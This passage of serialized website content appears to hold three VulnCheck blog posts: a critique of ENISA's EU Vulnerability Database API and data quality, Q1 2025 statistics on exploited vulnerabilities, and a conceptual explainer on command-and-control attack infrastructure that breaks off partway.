vulnerability counts.",[61,43325,43327],{"id":43326},"technical-limitations-of-the-euvd-api","Technical Limitations of the EUVD API",[993,43329,43331],{"id":43330},"slow-api-access","Slow API Access",[18,43333,43334],{},"Downloading the currently available records from the EUVD vulnerabilities API endpoint proved time-consuming. Others I've spoken with who are also exploring the EUVD dataset have reported similar experiences, with download times exceeding multiple hours in most cases. 
This makes it challenging to automate or scale interactions with the EUVD API in its current state.",[18,43336,43337,43338,59],{},"To be fair, performance bottlenecks like this are not unique to vulnerability databases, as anyone who has used NIST NVD can attest. At VulnCheck, we experienced similar constraints before migrating to a more modern, scalable architecture as our customer base grew. I discussed that transition and some of the architectural decisions behind it in ",[47,43339,43342],{"href":43340,"rel":43341},"https:\u002F\u002Fwww.linkedin.com\u002Fposts\u002Fpatrickmgarrity_cybersecurity-infosecurity-riskmanagement-activity-7316543042155421697-97Og?utm_source=share&utm_medium=member_desktop&rcm=ACoAAADShEQBPA7bU2zaIIHMTqDWMnEOq7PYu7g",[51],"this video",[61,43344,43346],{"id":43345},"modified-epss-scores-in-apis","Modified EPSS Scores in APIs",[18,43348,43349],{},"ENISA appears to have made a mistake in its implementation of EPSS scores, a common issue among projects integrating EPSS. Misunderstandings around how EPSS works often lead to inadvertent misuse or misrepresentation of the scores.",[18,43351,43352],{},"In this case, ENISA has enriched their API data with EPSS values but removed the fifth decimal place and converted the original decimal scores into percentages by multiplying them by 100, resulting in an EPSS score range between 0 and 100. It's common to present a probability as a percentage in a UI; however, the API gives no indication that the score was modified. 
This results in a misrepresentation of the actual EPSS score itself and introduces the possibility of misleading downstream consumers.",[18,43354,43355],{},"Here are a few examples of the scoring differences:",[307,43357,43358,43373],{},[310,43359,43360],{},[313,43361,43362,43364,43367,43370],{},[316,43363,319],{},[316,43365,43366],{},"ENISA EPSS (API)",[316,43368,43369],{},"First EPSS Score",[316,43371,43372],{},"First EPSS Percentile",[336,43374,43375,43388,43402],{},[313,43376,43377,43380,43382,43385],{},[341,43378,43379],{},"CVE-2020-6144",[341,43381,24698],{},[341,43383,43384],{},"0.09991",[341,43386,43387],{},"0.92618",[313,43389,43390,43393,43396,43399],{},[341,43391,43392],{},"CVE-2024-3400",[341,43394,43395],{},"94.29",[341,43397,43398],{},"0.94286",[341,43400,43401],{},"0.99926",[313,43403,43404,43407,43410,43413],{},[341,43405,43406],{},"CVE-2019-20074",[341,43408,43409],{},".29",[341,43411,43412],{},"0.00287",[341,43414,43415],{},"0.51809",[61,43417,43419],{"id":43418},"enrichment-data-available-in-other-sources","Enrichment Data Available in Other Sources",[18,43421,43422],{},"There are a handful of important vulnerability enrichments available through NIST NVD \u002F CVE.org that are not available in ENISA EUVD. A few of the fields I would expect to see in a vulnerability database that are not present in EUVD include:",[22,43424,43425,43428,43431,43434,43437],{},[25,43426,43427],{},"CWE",[25,43429,43430],{},"CPE",[25,43432,43433],{},"Reference Tags",[25,43435,43436],{},"Metadata for source (CVSS Scores, Identifiers)",[25,43438,43439],{},"Support for multiple CVSS versions on a single record.",[18,43441,43442,43443,43447],{},"There are also vulnerabilities without CVSS scores that are available in NIST NVD. Here is an example: ",[47,43444,43445],{"href":43445,"rel":43446},"https:\u002F\u002Feuvd.enisa.europa.eu\u002Fvulnerability\u002FCVE-2020-2106",[51],". 
Leveraging NIST NVD as a source could help fill some of ENISA's gaps in historical data.",[18,43449,43450],{},"Several of these are current limitations of CVE.org as well.",[61,43452,43454],{"id":43453},"observations-of-identifiers-aliases","Observations of Identifiers \u002F Aliases",[993,43456,43458],{"id":43457},"cves-with-duplicate-euvd-identifiers","CVEs with Duplicate EUVD Identifiers",[18,43460,43461,43462,43467],{},"A handful of CVEs in the database carry multiple EUVD identifiers, which poses challenges for consumers, since a 1-for-1 match between CVE and EUVD ID can no longer be assumed.\nAn example of this is ",[47,43463,43466],{"href":43464,"rel":43465},"https:\u002F\u002Feuvd.enisa.europa.eu\u002Fvulnerability\u002FCVE-2025-25286",[51],"CVE-2025-25286"," which has two EUVD IDs: EUVD-2025-0100 and EUVD-2025-4100. I’m curious how ENISA plans to address duplicate identifiers moving forward.",[993,43469,43471],{"id":43470},"multiple-aliasesids-stored-into-a-single-string","Multiple Aliases\u002FIDs Stored into a Single String",[18,43473,43474],{},"There are several instances where EUVD stores multiple aliases in a single string. This makes it harder for consumers of the API, who have to parse the string themselves to identify each unique identifier and the source it came from. 
There could also be potential collisions between sources in the future as the amount of vulnerability sources grows.",[18,43476,43477],{},"Here is an example for EUVD-2022-0047:",[1354,43479,43481],{"className":22307,"code":43480,"language":22309,"meta":219,"style":219},"\"aliases\": \"CVE-2024-13484\\nGHSA-58fx-7v9q-3g56\\n\"\n",[886,43482,43483],{"__ignoreMap":219},[1373,43484,43485,43487,43490,43492,43494,43496,43499,43501,43504,43506],{"class":1375,"line":1376},[1373,43486,183],{"class":1387},[1373,43488,43489],{"class":1391},"aliases",[1373,43491,183],{"class":1387},[1373,43493,20051],{"class":4640},[1373,43495,183],{"class":1387},[1373,43497,43498],{"class":1391},"CVE-2024-13484",[1373,43500,8943],{"class":2326},[1373,43502,43503],{"class":1391},"GHSA-58fx-7v9q-3g56",[1373,43505,8943],{"class":2326},[1373,43507,19057],{"class":1387},[18,43509,43510],{},"An alternative structure could include the source of the identifier:",[1354,43512,43514],{"className":22307,"code":43513,"language":22309,"meta":219,"style":219},"\"aliases\": [\n  {\n    \"id\": \"CVE-2024-13484\",\n    \"source\": \"CVE\"\n  },\n  {\n    \"id\": \"GHSA-58fx-7v9q-3g56\",\n    \"source\": \"GitHub\"\n  
}\n]\n",[886,43515,43516,43528,43532,43550,43567,43571,43575,43593,43609,43613],{"__ignoreMap":219},[1373,43517,43518,43520,43522,43524,43526],{"class":1375,"line":1376},[1373,43519,183],{"class":1387},[1373,43521,43489],{"class":1391},[1373,43523,183],{"class":1387},[1373,43525,20051],{"class":4640},[1373,43527,9050],{"class":1383},[1373,43529,43530],{"class":1375,"line":220},[1373,43531,26177],{"class":1383},[1373,43533,43534,43536,43538,43540,43542,43544,43546,43548],{"class":1375,"line":1266},[1373,43535,19050],{"class":9152},[1373,43537,26412],{"class":9155},[1373,43539,183],{"class":9152},[1373,43541,4606],{"class":1383},[1373,43543,4883],{"class":9173},[1373,43545,43498],{"class":9176},[1373,43547,183],{"class":9173},[1373,43549,9062],{"class":1383},[1373,43551,43552,43554,43557,43559,43561,43563,43565],{"class":1375,"line":1852},[1373,43553,19050],{"class":9152},[1373,43555,43556],{"class":9155},"source",[1373,43558,183],{"class":9152},[1373,43560,4606],{"class":1383},[1373,43562,4883],{"class":9173},[1373,43564,319],{"class":9176},[1373,43566,19057],{"class":9173},[1373,43568,43569],{"class":1375,"line":4692},[1373,43570,23985],{"class":1383},[1373,43572,43573],{"class":1375,"line":4724},[1373,43574,26177],{"class":1383},[1373,43576,43577,43579,43581,43583,43585,43587,43589,43591],{"class":1375,"line":4756},[1373,43578,19050],{"class":9152},[1373,43580,26412],{"class":9155},[1373,43582,183],{"class":9152},[1373,43584,4606],{"class":1383},[1373,43586,4883],{"class":9173},[1373,43588,43503],{"class":9176},[1373,43590,183],{"class":9173},[1373,43592,9062],{"class":1383},[1373,43594,43595,43597,43599,43601,43603,43605,43607],{"class":1375,"line":4768},[1373,43596,19050],{"class":9152},[1373,43598,43556],{"class":9155},[1373,43600,183],{"class":9152},[1373,43602,4606],{"class":1383},[1373,43604,4883],{"class":9173},[1373,43606,2485],{"class":9176},[1373,43608,19057],{"class":9173},[1373,43610,43611],{"class":1375,"line":4792},[1373,43612,27147],{"class":1383},[1
373,43614,43615],{"class":1375,"line":4798},[1373,43616,7103],{"class":1383},[61,43618,43620],{"id":43619},"additional-questions-about-data-quality-enrichment","Additional Questions About Data Quality \u002F Enrichment",[18,43622,43623],{},"While conducting this research, I wanted to further evaluate the data quality. However, due to time constraints and, more critically, the challenges involved in obtaining complete and accurate data, a deeper analysis will take more time. I made many observations during my research that I just didn't have time to chase down and validate, and I would encourage others to share their own experiences.",[18,43625,43626],{},"That said, my general impression is that the EUVD currently offers less complete data, with a delivery model that makes it difficult for consumers to access and consume effectively. I’m looking forward to seeing how they improve on this in the future.",[61,43628,43630],{"id":43629},"lack-of-feedback-loop-for-those-that-want-to-help","Lack of Feedback Loop for Those That Want to Help",[18,43632,43633,43634,43639],{},"ENISA EUVD ",[47,43635,43638],{"href":43636,"rel":43637},"https:\u002F\u002Feuvd.enisa.europa.eu\u002Ffaq",[51],"FAQ"," currently states, “We do not send individual follow-ups.” This policy is disappointing: it tells consumers and researchers who want to help improve data quality that communication is one-way, with no feedback loop, even though such a loop is incredibly valuable when building a new service. A more collaborative approach with the security community would significantly benefit the EUVD project and likely improve its quality and reliability.",[18,43641,43642],{},"While some may view NIST NVD and CVE.org as less than fully receptive to community input, my experience has been that they are generally responsive to researchers and users, even if there’s still plenty of room for improvement. 
This kind of open dialogue and engagement is important if ENISA EUVD hopes to be seen as a viable and trusted alternative.",[61,43644,43646],{"id":43645},"does-enisa-intended-for-people-to-rely-on-euvd-or-is-it-in-beta","Does ENISA Intend For People To Rely On EUVD, or Is It In Beta?",[18,43648,43649,43650,43654],{},"While ENISA issued a ",[47,43651,43653],{"href":43064,"rel":43652},[51],"press release"," announcing the EUVD as “operational”, the website itself states:",[43656,43657,43659],"author-quote",{"author":43658},"ENISA EUVD Website",[18,43660,43661],{},"This website is currently in its beta phase. We appreciate your collaboration in reporting any inaccurate or incomplete information via the link below 'Provide feedback'.",[18,43663,43664],{},"This sends mixed messages to users, particularly those evaluating EUVD as a potential alternative to CVE.org or the NIST NVD. The contradiction between an “operational” status and a “beta” disclaimer creates uncertainty around the platform’s maturity and reliability.",[61,43666,43668],{"id":43667},"does-enisa-euvd-live-up-to-the-hype","Does ENISA EUVD Live Up To The Hype?",[18,43670,43671],{},"In its current form, the EUVD lacks the completeness, accessibility, and enrichment required by enterprise consumers and national CERTs alike. With foundational work still needed on API design, data quality, and community collaboration, ENISA faces a steep climb if it hopes to become an alternative to more mature sources like CVE.org or NIST NVD. 
That said, its strategic importance for organizations doing business in the European Union is key for the success of this new tool mandated by the Cyber Resilience Act (CRA).",[61,43673,43675],{"id":43674},"special-thanks","Special Thanks",[18,43677,43678],{},"Thanks to Josh Bressers for validating some of my experiences and findings related to ENISA EUVD.",[61,43680,202],{"id":201},[18,43682,40664],{},[18,43684,40667,43685,8659,43688,40676],{},[47,43686,40672],{"href":40670,"rel":43687},[51],[47,43689,1233],{"href":2871,"rel":43690},[51],[2901,43692,43693],{},"",{"title":219,"searchDepth":220,"depth":220,"links":43695},[43696,43697,43698,43705,43708,43709,43710,43714,43715,43716,43717,43718,43719],{"id":43079,"depth":220,"text":43080},{"id":43092,"depth":220,"text":43093},{"id":43119,"depth":220,"text":43120,"children":43699},[43700,43701,43702,43703,43704],{"id":43126,"depth":1266,"text":43127},{"id":43183,"depth":1266,"text":43184},{"id":43193,"depth":1266,"text":43194},{"id":43250,"depth":1266,"text":43251},{"id":43266,"depth":1266,"text":43267},{"id":43326,"depth":220,"text":43327,"children":43706},[43707],{"id":43330,"depth":1266,"text":43331},{"id":43345,"depth":220,"text":43346},{"id":43418,"depth":220,"text":43419},{"id":43453,"depth":220,"text":43454,"children":43711},[43712,43713],{"id":43457,"depth":1266,"text":43458},{"id":43470,"depth":1266,"text":43471},{"id":43619,"depth":220,"text":43620},{"id":43629,"depth":220,"text":43630},{"id":43645,"depth":220,"text":43646},{"id":43667,"depth":220,"text":43668},{"id":43674,"depth":220,"text":43675},{"id":201,"depth":220,"text":202},"2025-05-20","This research aims to share experiences and observations to help others better understand how ENISA EUVD compares with existing vulnerability sources and whether it can serve as a reliable alternative for these established services.",{"slug":43723},"enisa-euvd","\u002Fblog\u002Fenisa-euvd",{"title":43054,"description":43721},"blog\u002Fenisa-euvd",[1280,242,1279],"gyTHvudOZsdKsPLUuJ4EK2IekuUdZ3L5orp9gSO7A3w",{"id":43730,"title":43731,"articles":43732,"authors":43766,"body":43768,"date":43736,"description":43969,"extension":234,"image":7,"link":7,"meta":43970,"navigation":237,"path":43972,"seo":43973,"series":7,"stem":43974,"subtype":7,"tags":43975,"__hash__":43976},"blog\u002Fblog\u002Fexploitation-trends-q1-2025.md","2025 Q1 Trends in Vulnerability 
Exploitation",[43733,43737,43740,43743,43747,43750,43754,43758,43762],{"title":43734,"source":14382,"link":43735,"date":43736},"159 CVEs Exploited in Q1 2025 — 28.3% Within 24 Hours of Disclosure","https:\u002F\u002Fthehackernews.com\u002F2025\u002F04\u002F159-cves-exploited-in-q1-2025-283.html","2025-04-24",{"title":3494,"source":3495,"link":43738,"date":43739},"https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-fbi-ic3-verizon-dbir-google-m-trends-reports-are-out-heres-the-conclusions\u002F","2024-04-24",{"title":43741,"source":11228,"link":43742,"date":43736},"VulnCheck spotted 159 actively exploited vulnerabilities in first few months of 2025","https:\u002F\u002Fcyberscoop.com\u002Fvulncheck-known-exploited-cves-q1-2025\u002F",{"title":43744,"source":14386,"link":43745,"date":43746},"159 CVEs Exploited in The Wild in Q1 2025, 8.3% of Vulnerabilities Exploited Within 1-Day","https:\u002F\u002Fcybersecuritynews.com\u002F159-cves-exploited-in-the-wild-in-q1-2025\u002F","2025-04-25",{"title":43748,"source":12153,"link":43749,"date":43746},"Actively exploited CVEs rise in Q1, report finds","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Factively-exploited-cves-rise-in-q1-report-finds",{"title":43751,"source":43752,"link":43753,"date":43746},"Exploited CVEs Rise in Q1 2025, With Faster Turnaround Times","ChannelE2E","https:\u002F\u002Fwww.channele2e.com\u002Fbrief\u002Fexploited-cves-rise-in-q1-2025-with-faster-turnaround-times",{"title":43734,"source":43755,"link":43756,"date":43757},"Energy Central","https:\u002F\u002Fenergycentral.com\u002Fc\u002Fiu\u002F159-cves-exploited-q1-2025-%E2%80%94-283-within-24-hours-disclosure","2025-04-27",{"title":43759,"source":3481,"link":43760,"date":43761},"Samsung admits Galaxy devices can leak passwords through clipboard wormhole","https:\u002F\u002Fwww.theregister.com\u002F2025\u002F04\u002F28\u002Fsecurity_news_in_brief\u002F","2025-04-28",{"title":43763,"source":11218,"link":43764,"date":43765},"Vulnerability 
Exploitation Is Shifting in 2024-25","https:\u002F\u002Fwww.darkreading.com\u002Fvulnerabilities-threats\u002Fvulnerability-exploitation-shifting-2024-25","2025-04-29",[43767],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":43769,"toc":43959},[43770,43773,43777,43797,43801,43807,43810,43827,43830,43833,43850,43854,43860,43863,43867,43873,43876,43879,43883,43889,43892,43918,43922,43928,43931,43935,43941,43944,43947,43949,43951],[18,43771,43772],{},"In Q1 2025, VulnCheck identified evidence of 159 CVEs publicly disclosed for the first time as exploited in the wild. The disclosure of known exploited vulnerabilities was from 50 different sources. We continue to see vulnerabilities being exploited at a fast pace with 28.3% of vulnerabilities being exploited within 1-day of their CVE disclosure. This trend continues from a similar pace we saw in 2024. This demonstrates the need for defenders to move fast on emerging threats while continuing to burn down their vulnerability debt.",[61,43774,43776],{"id":43775},"here-are-the-key-take-aways-from-our-analysis-and-coverage-of-known-exploited-vulnerabilities","Here are the key take-aways from our analysis and coverage of known exploited vulnerabilities",[22,43778,43779,43782,43785,43788,43791,43794],{},[25,43780,43781],{},"159 KEVs were publicly disclosed in Q1-2025",[25,43783,43784],{},"28.3% of KEVs had exploitation evidence disclosed in \u003C 1-day of a CVE being published",[25,43786,43787],{},"25.8% of KEVs are still awaiting or undergoing analysis by NIST NVD",[25,43789,43790],{},"3.1% of KEVs have been assigned the new \"Deferred\" status by NIST NVD",[25,43792,43793],{},"2 KEVs reported publicly have reserved but unpublished CVEs",[25,43795,43796],{},"1 KEV reported is now rejected",[61,43798,43800],{"id":43799},"what-product-categories-vendors-and-products-were-reported-as-being-exploited","What Product Categories, Vendors and Products were Reported as Being 
Exploited?",[18,43802,43803],{},[68,43804],{"alt":43805,"src":43806,"width":28205},"Category KEV Trends","\u002Fblog\u002Fexploitation-trends-q1-2025\u002Fkev-categories.png",[18,43808,43809],{},"The top five categories associated with new KEVs in Q1 2025 were:",[22,43811,43812,43815,43818,43821,43824],{},[25,43813,43814],{},"Content Management Systems (CMS) (35)",[25,43816,43817],{},"Network Edge Devices (29)",[25,43819,43820],{},"Operating Systems (24)",[25,43822,43823],{},"Open Source Software (14)",[25,43825,43826],{},"Server Software (14)",[18,43828,43829],{},"These categories commonly include systems that are either internet-facing or accessible to end users. Notably, a relatively low number of KEVs were tied to desktop applications and browsers, which have historically been more frequently exploited. It will be interesting to see if this shift continues in the coming quarters.",[18,43831,43832],{},"Leading vendors and products impacted included:",[22,43834,43835,43838,43841,43844,43847],{},[25,43836,43837],{},"Microsoft Windows (15)",[25,43839,43840],{},"Broadcom VMware (6)",[25,43842,43843],{},"Cyber PowerPanel (5)",[25,43845,43846],{},"Litespeed Technologies (4)",[25,43848,43849],{},"Totolink Routers (4)",[61,43851,43853],{"id":43852},"how-quickly-was-exploitation-evidence-reported","How Quickly Was Exploitation Evidence Reported?",[18,43855,43856],{},[68,43857],{"alt":43858,"src":43859,"width":28205},"Monthly KEV Trends","\u002Fblog\u002Fexploitation-trends-q1-2025\u002Ftime-to-kev.png",[18,43861,43862],{},"When we look at the time from CVE disclosure to exploitation evidence, we can better understand how quickly vulnerabilities are being exploited. We observed 28.3% of KEVs had exploitation evidence disclosed in \u003C 1-day of a CVE being published. 2 KEVs are still in reserved status and 1 was rejected. 
This appears to be marginally faster than what we saw in 2024 as threat actors continue to move fast on new vulnerabilities.",[61,43864,43866],{"id":43865},"how-many-vulnerabilities-were-reported-as-exploited-each-weekmonth-for-the-first-time","How Many Vulnerabilities were Reported as Exploited Each Week\u002FMonth for the First Time?",[18,43868,43869],{},[68,43870],{"alt":43871,"src":43872,"width":28205},"Weekly\u002FMonthly KEV Trends","\u002Fblog\u002Fexploitation-trends-q1-2025\u002Fweekly-kevs.png",[18,43874,43875],{},"What began as a slow start to the year (likely seasonal) quickly shifted, with a surge toward the back half of the quarter in public exploitation disclosures leading to 159 Known Exploited Vulnerabilities (KEVs) reported in Q1 2025. On average, 11.4 KEVs were disclosed weekly, and 53 per month. While CISA KEV added 73 vulnerabilities during the quarter, only 12 showed no prior public evidence of exploitation.",[18,43877,43878],{},"For defenders, this trend provides valuable insight for capacity planning around emerging, vulnerability-related threats.",[61,43880,43882],{"id":43881},"who-was-the-first-to-publicly-report-exploitation","Who Was the First to Publicly Report Exploitation?",[18,43884,43885],{},[68,43886],{"alt":43887,"src":43888,"width":28205},"KEV Sources","\u002Fblog\u002Fexploitation-trends-q1-2025\u002Fkev-sources.png",[18,43890,43891],{},"In Q1 2025, there were 159 vulnerabilities with publicly disclosed evidence of exploitation sourced from 50 different organizations. Notably, the data showed a long-tail distribution of these disclosures, a valuable trend for defenders seeking actionable threat intelligence.\nBy comparison, Q4 2024 saw 190 exploitation disclosures tied to CVEs. However, 39 were older WordPress vulnerabilities with previously known exploitation activity. After coordinating with Wordfence to assign CVEs, these were officially published, inflating the Q4 total. 
Excluding them, the adjusted number would be 151.\nTop contributors to disclosing exploitation evidence publicly included:",[22,43893,43894,43897,43900,43903,43906,43909,43912,43915],{},[25,43895,43896],{},"Shadow Server (31)",[25,43898,43899],{},"GreyNoise (17)",[25,43901,43902],{},"CISA KEV (12)",[25,43904,43905],{},"Microsoft (12)",[25,43907,43908],{},"Sentinel One (10)",[25,43910,43911],{},"Cyble (9)",[25,43913,43914],{},"Patchstack (6)",[25,43916,43917],{},"Secure List (5)",[61,43919,43921],{"id":43920},"what-are-the-current-nvdcve-statuses-of-q1-2025-kevs","What are the Current NVD\u002FCVE Statuses of Q1-2025 KEVS?",[18,43923,43924],{},[68,43925],{"alt":43926,"src":43927,"width":28205},"KEV NVD Statuses","\u002Fblog\u002Fexploitation-trends-q1-2025\u002Fnist-nvd-status.png",[18,43929,43930],{},"We wanted to explore the current NVD\u002FCVE statuses of vulnerabilities’ with known exploitation to identify potential gaps in NIST’s NVD coverage. Our analysis found that 25.8% are still awaiting or undergoing analysis, 3.1% have been assigned the new \"Deferred\" status, and 69.2% are marked as \"Analyzed\" or \"Modified.\"",[61,43932,43934],{"id":43933},"a-look-at-q1-2025-known-exploited-vulnerabilities-mapped-to-scoring-system","A Look at Q1 2025 Known Exploited Vulnerabilities Mapped to Scoring System",[18,43936,43937],{},[68,43938],{"alt":43939,"src":43940,"width":28205},"Scoring Systems","\u002Fblog\u002Fexploitation-trends-q1-2025\u002Fkev-scoring-systems.png",[18,43942,43943],{},"When examining the emerging threat use case through the lens of CVSS and EPSS scoring, we used the EPSS scores on the day exploitation evidence became publicly available and any available CVSS score at the time of research. We found that only a handful of vulnerabilities had elevated EPSS scores on the same day as exploitation disclosure, despite being known to have been exploited. 
This suggests that EPSS is largely a trailing indicator rather than a predictive tool for emerging threats.",[18,43945,43946],{},"Organizations should exercise caution when relying on vulnerability scoring systems for emerging threats.",[61,43948,202],{"id":201},[18,43950,40664],{},[18,43952,40667,43953,8659,43956,40676],{},[47,43954,40672],{"href":40670,"rel":43955},[51],[47,43957,1233],{"href":2871,"rel":43958},[51],{"title":219,"searchDepth":220,"depth":220,"links":43960},[43961,43962,43963,43964,43965,43966,43967,43968],{"id":43775,"depth":220,"text":43776},{"id":43799,"depth":220,"text":43800},{"id":43852,"depth":220,"text":43853},{"id":43865,"depth":220,"text":43866},{"id":43881,"depth":220,"text":43882},{"id":43920,"depth":220,"text":43921},{"id":43933,"depth":220,"text":43934},{"id":201,"depth":220,"text":202},"In Q1 2025, VulnCheck identified evidence of 159 CVEs publicly disclosed for the first time as exploited in the wild.",{"slug":43971},"exploitation-trends-q1-2025","\u002Fblog\u002Fexploitation-trends-q1-2025",{"title":43731,"description":43969},"blog\u002Fexploitation-trends-q1-2025",[1280,242,1279],"fMAzbHxeBpgI-kgma94lSv2eiAPxD6SQ7MRnzDMpR-Y",{"id":43978,"title":43979,"articles":7,"authors":43980,"body":43982,"date":44339,"description":44340,"extension":234,"image":7,"link":7,"meta":44341,"navigation":237,"path":44343,"seo":44344,"series":44345,"stem":44346,"subtype":7,"tags":44347,"__hash__":44348},"blog\u002Fblog\u002Funderstanding-command-control-infrastructure.md","Understanding Command & Control (C2) 
Infrastructure",[43981],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":43983,"toc":44319},[43984,43987,44001,44005,44008,44011,44022,44030,44034,44037,44069,44073,44076,44090,44094,44097,44101,44104,44108,44111,44122,44125,44129,44132,44136,44140,44160,44164,44168,44171,44175,44178,44182,44185,44199,44202,44206,44209,44220,44223,44227,44230,44241,44245,44248,44274,44278,44281,44284,44310,44313,44316],[18,43985,43986],{},"This knowledgebase article will give insight into:",[22,43988,43989,43992,43995,43998],{},[25,43990,43991],{},"The definition and key features of a C2 infrastructure",[25,43993,43994],{},"The characteristics of a C2-driven attack",[25,43996,43997],{},"Common types of C2 malware",[25,43999,44000],{},"Ways security teams can mitigate risks of C2-based attacks",[61,44002,44004],{"id":44003},"what-is-a-command-control-c2-infrastructure","What is a Command & Control (C2) Infrastructure?",[18,44006,44007],{},"In many ways, a command and control (C2) attack is the threat actor version of using a remote control car or drone. Attackers compromise devices, deploy malware to them, and then remotely control them to further their objectives, such as stealing sensitive data or distributing spam. Command and control (C2 or C&C) infrastructure is the technical foundation of these attacks. By understanding what C2 is and how C2-based attacks work, security teams can improve their effectiveness and reduce an attack’s impact.",[18,44009,44010],{},"“Command and control” refers to the systems that attackers use to communicate with and control the malware running on compromised devices. 
Through this infrastructure, they can maintain remote, covert control over the victim’s systems to coordinate additional malicious activities like:",[22,44012,44013,44016,44019],{},[25,44014,44015],{},"Deploying additional malware",[25,44017,44018],{},"Exfiltrating data",[25,44020,44021],{},"Controlling botnets",[18,44023,44024,44025,59],{},"C2 infrastructures use various technologies to evade detection, often used as part of an ",[47,44026,44029],{"href":44027,"rel":44028},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Funderstanding-apts",[51],"advanced persistent threat (APT)",[61,44031,44033],{"id":44032},"what-are-the-key-features-of-a-c2-infrastructure","What are the Key Features of a C2 Infrastructure?",[18,44035,44036],{},"To better detect and defend against C2-based attacks, security teams should understand the infrastructure’s key features:",[22,44038,44039,44045,44051,44057,44063],{},[25,44040,44041,44044],{},[295,44042,44043],{},"Remote management",": Threat actors can issue instructions and maintain remote control over compromised devices.",[25,44046,44047,44050],{},[295,44048,44049],{},"Communication protocols and covert channels",": Hidden or disguised channels enable attackers to operate without triggering security alerts.",[25,44052,44053,44056],{},[295,44054,44055],{},"Command execution and data exfiltration",": The infrastructure enables attackers to execute commands on infected machines, helping them steal sensitive information.",[25,44058,44059,44062],{},[295,44060,44061],{},"Installing additional malware",": Attackers can use the C2 infrastructure to install new malware on infected devices for even more control over them.",[25,44064,44065,44068],{},[295,44066,44067],{},"Domain Generation Algorithms (DGAs)",": By creating many domain names, the attackers make tracking and blocking all malicious domains a challenge.",[61,44070,44072],{"id":44071},"what-are-command-and-control-attacks","What are Command and Control 
Attacks?",[18,44074,44075],{},"In a C2-driven attack, threat actors remotely control a target network’s systems with control servers that allow them to execute various suspicious activities. The attackers use covert communication channels to coordinate with the infected machines, enabling them to maintain persistent access to compromised systems, often leading to the following consequences:",[22,44077,44078,44081,44084,44087],{},[25,44079,44080],{},"Ransomware injection",[25,44082,44083],{},"Financial document theft",[25,44085,44086],{},"Business disruption",[25,44088,44089],{},"Corporate or nation-state espionage",[61,44091,44093],{"id":44092},"how-do-c2-driven-attacks-work","How do C2-driven Attacks Work?",[18,44095,44096],{},"C2-driven attacks seek to maintain control over infected devices and compromised systems so that attackers can steal information or disrupt operations. However, they are often more sophisticated than other attack types, requiring a series of coordinated steps to execute successfully.",[993,44098,44100],{"id":44099},"c2-server-setup","C2 Server Setup",[18,44102,44103],{},"The C2 server is the attack’s central hub for managing and controlling compromised devices. Threat actors use the C2 servers to send commands to infected machines while receiving stolen data. The servers maintain a constant communication link with the compromised network so that attackers can execute remote commands and processes.",[993,44105,44107],{"id":44106},"initial-compromise","Initial Compromise",[18,44109,44110],{},"During the initial compromise phase, attackers gain unauthorised access to target systems. 
Some typical ways they gain initial access include:",[22,44112,44113,44116,44119],{},[25,44114,44115],{},"Deploying phishing attacks to trick people into providing credentials",[25,44117,44118],{},"Exploiting vulnerabilities in software, firmware, and operating systems",[25,44120,44121],{},"Purchasing leaked or stolen credentials on the dark web",[18,44123,44124],{},"This phase establishes a foothold so that they can further infiltrate the network.",[993,44126,44128],{"id":44127},"callback-mechanism-command-and-control-channel","Callback Mechanism (Command and Control Channel)",[18,44130,44131],{},"The callback mechanism, also called the C2 channel, establishes a connection between compromised devices and the C2 server, typically using common network protocols, like HTTP or HTTPS, to hide in normal traffic. Once a device has malware installed, it reaches out to the C2 server to maintain constant communications, often encrypted ones. Since callbacks use legitimate network channels, the malicious operations often remain hidden from detection.",[993,44133,44135],{"id":44134},"command-execution","Command Execution",[993,44137,44139],{"id":44138},"once-attackers-establish-a-c2-connection-they-often-send-compromised-devices-additional-instructions-which-is-the-command-execution-phase-some-examples-of-what-attackers-do-when-they-can-remotely-control-and-manage-compromised-devices-include","Once attackers establish a C2 connection, they often send compromised devices additional instructions which is the command execution phase. 
Some examples of what attackers do when they can remotely control and manage compromised devices include:",[22,44141,44142,44148,44154],{},[25,44143,44144],{},[993,44145,44147],{"id":44146},"forcing-them-to-install-additional-malware-payloads-which-extends-attacker-control-over-the-system","Forcing them to install additional malware payloads, which extends attacker control over the system",[25,44149,44150],{},[993,44151,44153],{"id":44152},"using-the-infrastructure-a-hub-for-controlling-a-botnet-and-sending-it-commands-from-a-central-point-to-each-compromised-machine","Using the infrastructure as a hub for controlling a botnet and sending it commands from a central point to each compromised machine",[25,44155,44156],{},[993,44157,44159],{"id":44158},"downloading-and-executing-ransomware-and-encryption-keys","Downloading and executing ransomware and encryption keys",[993,44161,44163],{"id":44162},"through-command-execution-they-can-manipulate-compromised-systems-to-achieve-additional-objectives-or-adjust-strategies","Through command execution, they can manipulate compromised systems to achieve additional objectives or adjust strategies.",[993,44165,44167],{"id":44166},"lateral-movement-and-persistence","Lateral Movement and Persistence",[18,44169,44170],{},"After gaining initial access, attackers compromise other machines and gather additional credentials. Escalating privileges, like gaining administrative access to a database, enables them to access more business-critical systems and data. As they move across the networks, they can hide from security teams more effectively, remaining undetected and expanding their influence.",[993,44172,44174],{"id":44173},"data-discovery","Data Discovery",[18,44176,44177],{},"As attackers move laterally across networks and systems, they look for critical data, like intellectual property or financial documents. 
As part of this process, they map the network landscape to understand where sensitive assets reside, enabling them to focus efforts on highly rewarding data while minimizing detection.",[993,44179,44181],{"id":44180},"data-exfiltration","Data Exfiltration",[18,44183,44184],{},"During data exfiltration, the C2 servers may covertly transfer data to the attackers, including:",[22,44186,44187,44190,44193,44196],{},[25,44188,44189],{},"Intellectual property",[25,44191,44192],{},"Personally identifiable information (PII)",[25,44194,44195],{},"Credit card or bank account information",[25,44197,44198],{},"Proprietary documents",[18,44200,44201],{},"Security teams often struggle to identify this data theft since the threat actors use obfuscation techniques, like encryption, to hide in regular network traffic. For financially motivated cybercriminals, these activities may be the end goal since they can sell the data on the dark web.",[993,44203,44205],{"id":44204},"coordinating-sophisticated-attacks","Coordinating Sophisticated Attacks",[18,44207,44208],{},"Since the C2 infrastructure enables persistence, attackers often use it for operations that aim to steal data or disrupt systems over long periods of time. 
